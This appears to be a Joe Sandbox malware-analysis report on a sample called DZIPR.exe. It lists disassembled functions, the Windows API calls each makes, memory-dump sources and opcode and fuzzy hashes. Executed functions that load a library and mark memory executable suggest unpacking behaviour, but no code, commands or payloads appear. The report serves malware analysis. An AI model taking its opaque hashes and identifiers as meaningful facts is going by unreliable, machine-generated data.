Opcode Fuzzy Hash: f731b1095bc78a00a3f24d44dffe3f4818e611650ff866dd9b39410ad260c956
Instruction Fuzzy Hash: 2201D43174424AABDB108BA6CD8AF5A7BADEF84354F244812F908CBA41DF70DC01C760

Function 6C920F8D Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

GetTopWindow.USER32(?), ref: 6C920F9D
GetTopWindow.USER32(00000000), ref: 6C920FDC
GetWindow.USER32(00000000,00000002), ref: 6C920FFA

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: b60e10604ef12271ccab04803e16d25ccacdc5c27301ec8d2d9dd53903f7b601
Instruction ID: 32362283ea11925cfa6a021bb1de996ebbe253196180f538787fb1e72df92a26
Opcode Fuzzy Hash: b60e10604ef12271ccab04803e16d25ccacdc5c27301ec8d2d9dd53903f7b601
Instruction Fuzzy Hash: E201693208529ABBCF225E918D08EDF3F2AAF49394F104011FA9455928C73AC531EBA5

Function 6C92EC63 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 6C92EC89

Part of subcall function 6C92EAAE: __fltout2.LIBCMT ref: 6C92EADA

__cftog_l.LIBCMT ref: 6C92ECAF
__cftoe_l.LIBCMT ref: 6C92ECE1

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: 2e2b2fca7b167e623cd79f89b8639961ef1f6bc3af0b81020b4218ae9c397217
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: F911837241014EBBCF129FD4DC81CDD3F66BB19359F188414FAA855534C73AC6B1AB81

Function 6C9203CF Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 6C9203DC
GetTopWindow.USER32(00000000), ref: 6C9203EF

Part of subcall function 6C9203CF: GetWindow.USER32(00000000,00000002), ref: 6C920436

GetTopWindow.USER32(?), ref: 6C92041F

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: 621f60b7a6ba9ecf98f14fa39487575af379939c2043cf055266cfae59f2591d
Instruction ID: ef29f82875ba429ba2fd538cdfc344c974800e927222710cd074b2aae1e9b440
Opcode Fuzzy Hash: 621f60b7a6ba9ecf98f14fa39487575af379939c2043cf055266cfae59f2591d
Instruction Fuzzy Hash: A901F73211659ABBDF222F218C24ECF3A2DAF51398F04E122FD5891909F738C51186D5

Function 6C91CD66 Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000000B), ref: 6C91CD75
GetSystemMetrics.USER32(0000000C), ref: 6C91CD7C
GetSystemMetrics.USER32(00000002), ref: 6C91CD83
GetSystemMetrics.USER32(00000003), ref: 6C91CD8D

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-0
Opcode ID: f0a622cc623e56eee8b4709551fe8ac40611e8acdce330551d32b3262544a437
Instruction ID: 22fff9c0cf626c2dd36a1d92f64354cbb861477ee5037139107c268b98a964e9
Opcode Fuzzy Hash: f0a622cc623e56eee8b4709551fe8ac40611e8acdce330551d32b3262544a437
Instruction Fuzzy Hash: 86F049B1F44714BAEB205B728C49B267F78EB42721F208517E6088B280DBB5D8008FD0

Function 6C91C220 Relevance: 6.0, APIs: 4, Instructions: 38COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(6C9434A8), ref: 6C91C25A
RtlInitializeCriticalSection.NTDLL(?), ref: 6C91C26C
RtlLeaveCriticalSection.NTDLL(6C9434A8), ref: 6C91C279
RtlEnterCriticalSection.NTDLL(?), ref: 6C91C289

Part of subcall function 6C916DC1: __CxxThrowException@8.LIBCMT ref: 6C916DD7
Part of subcall function 6C916DC1: __EH_prolog3.LIBCMT ref: 6C916DE4

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
String ID:
API String ID: 2895727460-0
Opcode ID: fffb0fa50e0883b22a0fc766d6e2cc208ae4e21ca83d5be76436636873a3096f
Instruction ID: 8acb60922003c4203cda900740d2cb2b671499e0d044e7dd57d54f5506d2e104
Opcode Fuzzy Hash: fffb0fa50e0883b22a0fc766d6e2cc208ae4e21ca83d5be76436636873a3096f
Instruction Fuzzy Hash: 95F0FC3260C2186FCF102BB5CC86B59777EFBE2329F654927E10483D01CB30D541C5A5

Function 6C91BA5B Relevance: 6.0, APIs: 4, Instructions: 35COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(6C9432EC), ref: 6C91BA69
TlsGetValue.KERNEL32(6C9432D0,?,?,?,?,6C91C0B7,?,00000004,6C91AF00,6C916DDD,6C9168AD,?,6C924902,?), ref: 6C91BA7D
RtlLeaveCriticalSection.NTDLL(6C9432EC), ref: 6C91BA93
RtlLeaveCriticalSection.NTDLL(6C9432EC), ref: 6C91BA9E

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: CriticalSection$Leave$EnterValue
String ID:
API String ID: 3969253408-0
Opcode ID: 61f58444e44cb756542c2072a90632ca9e0fec787298d40f8ac6e12f327b32c8
Instruction ID: 886c0db4a512db73ad491b885eeb8d38b4443bc67138d4579c2fa2e2868934b3
Opcode Fuzzy Hash: 61f58444e44cb756542c2072a90632ca9e0fec787298d40f8ac6e12f327b32c8
Instruction Fuzzy Hash: F7F030B63082089FDB208F58C889C0AB7FFEB853643254817E65DD3A01D770F9459BE0

Function 6C93057A Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6C930586

Part of subcall function 6C92A27F: __getptd_noexit.LIBCMT ref: 6C92A282
Part of subcall function 6C92A27F: __amsg_exit.LIBCMT ref: 6C92A28F

__getptd.LIBCMT ref: 6C93059D
__amsg_exit.LIBCMT ref: 6C9305AB
__lock.LIBCMT ref: 6C9305BB

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: f8c48cff244dbfedb15d64d984bbfb506cae295a6a097ea952de61501ede9799
Instruction ID: 03907378641923197af6959e1484c02178f1db7e93c2ead1fcd33683da656afe
Opcode Fuzzy Hash: f8c48cff244dbfedb15d64d984bbfb506cae295a6a097ea952de61501ede9799
Instruction Fuzzy Hash: 6FF09032A15760CBDB20EB69840578D73A06B3072CF51754AE488A7F94CB38E905CB62

Function 6C92020C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6C92029B
SendMessageW.USER32(00000000,00000433,00000000,?), ref: 6C9202C4

Strings

,, xrefs: 6C9202BA

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: MessageSend_memset
String ID: ,
API String ID: 1827994538-3772416878
Opcode ID: 4e9c873f108f7195f921791e0780f90ea9be8c1980a83bbeeb3ff6a397a7a7c1
Instruction ID: 02633c6aedf4cdb7bbdbced0f9a80573da31477cc4c4a4d85076081c4d3ad88e
Opcode Fuzzy Hash: 4e9c873f108f7195f921791e0780f90ea9be8c1980a83bbeeb3ff6a397a7a7c1
Instruction Fuzzy Hash: 233144306113809FDB109FB5C894A9EBBF8BF58318F21122EE19697F90DB34E808CB44

Function 6C91A698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

Part of subcall function 6C91A59C: GetModuleHandleW.KERNEL32(KERNEL32,6C91A6B6), ref: 6C91A5AA
Part of subcall function 6C91A59C: GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6C91A5CB
Part of subcall function 6C91A59C: GetProcAddress.KERNEL32(ReleaseActCtx), ref: 6C91A5DD
Part of subcall function 6C91A59C: GetProcAddress.KERNEL32(ActivateActCtx), ref: 6C91A5EF
Part of subcall function 6C91A59C: GetProcAddress.KERNEL32(DeactivateActCtx), ref: 6C91A601

GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 6C91A6D0
SetLastError.KERNEL32(0000006F), ref: 6C91A6E7

Strings

, xrefs: 6C91A705

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: AddressProc$Module$ErrorFileHandleLastName
String ID:
API String ID: 2524245154-3916222277
Opcode ID: a6ffc472004e2af1f9cbe94a9a46dad01329b6a0ad1caee4f88f11e2e85849f5
Instruction ID: cb7cc421087a4714eecfc09ec235504de95922053c618d15f78c5e8a9bfc76f2
Opcode Fuzzy Hash: a6ffc472004e2af1f9cbe94a9a46dad01329b6a0ad1caee4f88f11e2e85849f5
Instruction Fuzzy Hash: CF217C7090421C9EDB20DF71C8597EEB7B8BF24328F10869AC069D6680DB749B89CF54

Function 6C918E50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 6C918E78
PathFindExtensionW.SHLWAPI(?), ref: 6C918E8E

Part of subcall function 6C918BDF: __EH_prolog3_GS.LIBCMT ref: 6C918BE9
Part of subcall function 6C918BDF: GetModuleHandleW.KERNEL32(kernel32.dll,00000260,6C918EB7,?,?), ref: 6C918C19
Part of subcall function 6C918BDF: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 6C918C2D
Part of subcall function 6C918BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6C918C69
Part of subcall function 6C918BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6C918C77
Part of subcall function 6C918BDF: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 6C918C94
Part of subcall function 6C918BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6C918CBF
Part of subcall function 6C918BDF: ConvertDefaultLocale.KERNEL32(000003FF), ref: 6C918CC8
Part of subcall function 6C918BDF: GetModuleFileNameW.KERNEL32(6C910000,?,00000105), ref: 6C918D7F

Strings

%s%s.dll, xrefs: 6C918E99

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3_HandlePath
String ID: %s%s.dll
API String ID: 1311856149-1649984862
Opcode ID: 24a449ab601d9aabb0eccd50e6258b05ddc87fd8b3ffa0201adc58189c084d71
Instruction ID: 562a3db35b6316da1ce9060be42ef977ac4f7975f2794244edaf72ea45afa719
Opcode Fuzzy Hash: 24a449ab601d9aabb0eccd50e6258b05ddc87fd8b3ffa0201adc58189c084d71
Instruction Fuzzy Hash: 4701A77161511CABCB15DB68D8459EB73BDFF4A304F110466A405E7500D770DA04CB58

Function 6C92C53C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6C925017: __getptd.LIBCMT ref: 6C92501D
Part of subcall function 6C925017: __getptd.LIBCMT ref: 6C92502D

__getptd.LIBCMT ref: 6C92C54B

Part of subcall function 6C92A27F: __getptd_noexit.LIBCMT ref: 6C92A282
Part of subcall function 6C92A27F: __amsg_exit.LIBCMT ref: 6C92A28F

__getptd.LIBCMT ref: 6C92C559

Strings

csm, xrefs: 6C92C567

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: a711b0bedc9af858f1a86284ce073587ea150faf51f5d3325d337f2bcfad7745
Instruction ID: fb3308d7053697f8904feab21db7bf495dd3287e29de72db3908106fdcd2ee5b
Opcode Fuzzy Hash: a711b0bedc9af858f1a86284ce073587ea150faf51f5d3325d337f2bcfad7745
Instruction Fuzzy Hash: 2A01A271829201CBEF24AF61C840A9DBFB9AF20218F64451ED4C0A6E5CCF38C984CF41

Analysis Process: DZIPR.exePID: 8048, Parent PID: 932COMMON

Executed Functions

Function 6FEA63F0 Relevance: 4.7, APIs: 3, Instructions: 239
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(00000000), ref: 6FEA6602
VirtualProtect.KERNELBASE(?,?,00000040,00000000), ref: 6FEA663B
VirtualProtect.KERNELBASE(?,?,?,00000000,?), ref: 6FEA6654

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 77737e6700965e20c40b6cbdc73dff0e1501477899c3e6bd9ddb3303b2241935
Instruction ID: 8dfcc0ad697abc4ce467b2ef11547946d5404f8d6a45d222ce4ad250fbb139e3
Opcode Fuzzy Hash: 77737e6700965e20c40b6cbdc73dff0e1501477899c3e6bd9ddb3303b2241935
Instruction Fuzzy Hash: 70A1AB305087558FC315CF6CC48066AFBE2BFCA308F19896EE8959B356D632E9558B81

Function 6FEA5CA0 Relevance: 3.4, APIs: 2, Instructions: 353
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: LibraryLoad_memset
String ID:
API String ID: 2997193564-0
Opcode ID: 8348686e6431dbc6a901d9eb7c30cf0457994e75fe240a2e6d2566047d7036bf
Instruction ID: 8e5e68a5b424ec8e66d1b671fa73c87357aebb0f963e0851272bb67f7d6a7dd3
Opcode Fuzzy Hash: 8348686e6431dbc6a901d9eb7c30cf0457994e75fe240a2e6d2566047d7036bf
Instruction Fuzzy Hash: AEE16DB49087058FC714CF69C49062AFBE5FF8A318F65892EE8998B351D731B855CF81

Function 6FEA5E70 Relevance: 1.5, APIs: 1, Instructions: 248
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalAlloc.KERNELBASE(00000000,007F50EB), ref: 6FEA5ECA

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 0802392e6cea054864f0b4cb64cffbb3c3fa306c57a1c74609391f981a39b17b
Instruction ID: 73f21e50b105959a464de6716583fb5657096b0e1874c20bc492bcc2a1c0a857
Opcode Fuzzy Hash: 0802392e6cea054864f0b4cb64cffbb3c3fa306c57a1c74609391f981a39b17b
Instruction Fuzzy Hash: DBA194746083068FC718CF2CC59062AFBE2BF8A308F24856DE8968B355D771F965CB81

Function 6FEABC4E Relevance: 16.6, APIs: 11, Instructions: 106
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlEnterCriticalSection.NTDLL(6FED32EC), ref: 6FEABC61
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,6FED32D0,6FED32D0,?,6FEAC0A4,00000004,6FEAAF00,6FEA6DDD,6FEA68AD,?,6FEB4902,?), ref: 6FEABCB7
GlobalHandle.KERNEL32(00D1D320), ref: 6FEABCC0
GlobalUnlock.KERNEL32(00000000), ref: 6FEABCCA
GlobalReAlloc.KERNEL32(?,00000000,00002002), ref: 6FEABCE3
GlobalHandle.KERNEL32(00D1D320), ref: 6FEABCF5
GlobalLock.KERNEL32(00000000), ref: 6FEABCFC
RtlLeaveCriticalSection.NTDLL(00000000), ref: 6FEABD05
GlobalLock.KERNEL32(00000000), ref: 6FEABD11
_memset.LIBCMT ref: 6FEABD2B
RtlLeaveCriticalSection.NTDLL(00000000), ref: 6FEABD59

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
String ID:
API String ID: 496899490-0
Opcode ID: f5be7fda8bac3929cf39035014df62524f8441d1da511f1efcc03a696f86fbe5
Instruction ID: d687d403ae56fe9b0a9cbccbdaa45fe611f5612c7f8ec7616da095ade2572349
Opcode Fuzzy Hash: f5be7fda8bac3929cf39035014df62524f8441d1da511f1efcc03a696f86fbe5
Instruction Fuzzy Hash: B931A071A04B04AFDB208F64C949E4A7FF9EF82314B21496EE562DB250DB32F940CB50

Function 6FEA64E0 Relevance: 4.7, APIs: 3, Instructions: 151
librarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(00000000), ref: 6FEA6602
VirtualProtect.KERNELBASE(?,?,00000040,00000000), ref: 6FEA663B

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: LibraryLoadProtectVirtual
String ID:
API String ID: 3279857687-0
Opcode ID: 8a6172e14e63b0cdfb04a1f425735b3736a1a5cce69153b06fd6a4b8d44fa76e
Instruction ID: 71d0f63ff8b0e58f8199337f82ed09c12966ea90a1f83022874dcda3f93b753c
Opcode Fuzzy Hash: 8a6172e14e63b0cdfb04a1f425735b3736a1a5cce69153b06fd6a4b8d44fa76e
Instruction Fuzzy Hash: 4251D1316083558FC715CF6CC88066AFBE6FFCA308F19896DE8855B316C632E956CB91

Function 6FEA6750 Relevance: 1.6, APIs: 1, Instructions: 109
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,?,6FECC168), ref: 6FEA6300

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1392d5d811b08c75bb1e1fce32fb3ceeeedde512118e5662146798a39e150e96
Instruction ID: 9baca7f1e1b0006907f493785f2bcc8848fd5c05c113904b51aa396aba961799
Opcode Fuzzy Hash: 1392d5d811b08c75bb1e1fce32fb3ceeeedde512118e5662146798a39e150e96
Instruction Fuzzy Hash: B841C535608B058FD704CF1DC84066ABBE2FFC7318F19856DE8899B315D636F85A8B81

Function 6FEA62D0 Relevance: 1.6, APIs: 1, Instructions: 97
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,?,6FECC168), ref: 6FEA6300

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 55af5fb6f8dd25c2212c9855496232efeba4171855623fd9fea8ed2c8da5a436
Instruction ID: 0b8c80ea2f14e0a779f29237db2009a2a906da7426b6209d7e9d3a57c4d9b96c
Opcode Fuzzy Hash: 55af5fb6f8dd25c2212c9855496232efeba4171855623fd9fea8ed2c8da5a436
Instruction Fuzzy Hash: 1A31A231A08B058FC714CF19C49466ABFE2AFC6314F29896DE8955B316D632F85ACB81

Function 6FEAC050 Relevance: 1.5, APIs: 1, Instructions: 43
COMMONLIBRARYCODE

Download Yara Rule

